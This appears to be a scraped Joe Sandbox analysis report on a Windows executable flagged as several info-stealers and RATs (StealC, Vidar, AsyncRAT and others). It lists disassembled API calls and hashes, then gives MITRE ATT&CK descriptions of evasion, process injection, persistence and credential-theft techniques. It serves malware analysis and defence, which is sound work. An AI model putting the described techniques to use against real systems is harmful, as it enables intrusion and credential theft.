PR_GetPageSize.NSS3(6C530936,FFFFE8AE,?,6C4C16B7,00000000,?,6C530936,00000000,?,6C4C204A), ref: 6C530F1B

Part of subcall function 6C531370: GetSystemInfo.KERNEL32(?,?,?,?,6C530936,?,6C530F20,6C530936,FFFFE8AE,?,6C4C16B7,00000000,?,6C530936,00000000), ref: 6C53138F

PR_NewLogModule.NSS3(clock,6C530936,FFFFE8AE,?,6C4C16B7,00000000,?,6C530936,00000000,?,6C4C204A), ref: 6C530F25

Part of subcall function 6C531110: calloc.MOZGLUE(00000001,0000000C,?,?,?,?,?,?,?,?,?,?,6C530936,00000001,00000040), ref: 6C531130
Part of subcall function 6C531110: strdup.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,6C530936,00000001,00000040), ref: 6C531142
Part of subcall function 6C531110: PR_GetEnvSecure.NSS3(NSPR_LOG_MODULES,?,?,?,?,?,?,?,?,?,?,?,?,?,6C530936,00000001), ref: 6C531167

Strings

clock, xrefs: 6C530F20

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: InfoModulePageSecureSizeSystemcallocstrdup
String ID: clock
API String ID: 536403800-3195780754
Opcode ID: a241f6f9f5bc6fe99d5f4953fc2fe14e046fdf70e6d132dd28ddee1932d1c245
Instruction ID: 3e29b3ebed8e15d6b4655d87110934a05a436c125d2c460061dc23c1ebb2a020
Opcode Fuzzy Hash: a241f6f9f5bc6fe99d5f4953fc2fe14e046fdf70e6d132dd28ddee1932d1c245
Instruction Fuzzy Hash: DAD02231600124A2C21022B7AC84BDFB3ACC7C32B9F002832E02C41D005A28A4DAC27D

Function 6C5A0DB0 Relevance: 5.1, APIs: 4, Instructions: 97COMMON

Download Yara Rule

APIs

calloc.MOZGLUE ref: 6C5A0DF5
TlsGetValue.KERNEL32 ref: 6C5A0E2D
TlsGetValue.KERNEL32 ref: 6C5A0E58
TlsGetValue.KERNEL32 ref: 6C5A0E84

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Value$calloc
String ID:
API String ID: 3339632435-0
Opcode ID: 0ea04afcb67a8962147f03bee8c1b5155c5e5a57bb49024e12a9370427eb0fac
Instruction ID: 89ce79fb52349598fbaa968235b96eeba6afa9ab3044b7d25846e0cb88147c82
Opcode Fuzzy Hash: 0ea04afcb67a8962147f03bee8c1b5155c5e5a57bb49024e12a9370427eb0fac
Instruction Fuzzy Hash: 6731F870664391CFDB109FBBDD8426D77B4BF85309F11452BD88AC7A10EB309486DB85

Function 6C5A0F10 Relevance: 5.1, APIs: 4, Instructions: 52stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C542AF5,?,?,?,?,?,6C540A1B,00000000), ref: 6C5A0F1A
malloc.MOZGLUE(00000001), ref: 6C5A0F30
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C5A0F42
TlsGetValue.KERNEL32 ref: 6C5A0F5B

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Valuemallocmemcpystrlen
String ID:
API String ID: 2332725481-0
Opcode ID: 28bb4d06ee2db8df1145c5c81c9fce13a26e9d7c790a2a50dc796ade2a0acb8f
Instruction ID: 144b746f7781eb38fa1bf7f53899836a5c88a429e966c42d8af56c555111a8c4
Opcode Fuzzy Hash: 28bb4d06ee2db8df1145c5c81c9fce13a26e9d7c790a2a50dc796ade2a0acb8f
Instruction Fuzzy Hash: 54014071E102909BE7105B7F9D4456A7B6CEFD6299F010533EC0ED3A21E731D816C1E6

Function 6C551EB0 Relevance: 5.0, APIs: 4, Instructions: 38COMMON

Download Yara Rule

APIs

free.MOZGLUE(?), ref: 6C551ECE
free.MOZGLUE(?), ref: 6C551EDF
free.MOZGLUE(?), ref: 6C551EEF
free.MOZGLUE(?), ref: 6C551EF5

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 49943805212f64f8973f97269db845fac28cf00c92fee3ba67e381547c9cdd10
Instruction ID: d2afef1cf9e93f80de3bf1ff08a814b6611e9bfaf0058e2886ee47ecda6ae0e1
Opcode Fuzzy Hash: 49943805212f64f8973f97269db845fac28cf00c92fee3ba67e381547c9cdd10
Instruction Fuzzy Hash: 82F054B17005066BEB00EF66DC85D67BB6CEF45695B540425EC1AC3A00D726F42486A9

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Process: OS API Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: `rundll32.exe {DLLname, DLLfunction}` ).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report i8Vwc7iOaG.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: LummaC

Threatname: Vidar

Threatname: Telegram RAT

Threatname: Amadey

Threatname: AsyncRAT

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Stealing of Sensitive Information

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\BFBGHDGCFHIDBGDGIIIEHIJDAF

Windows Analysis Report
i8Vwc7iOaG.exe

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre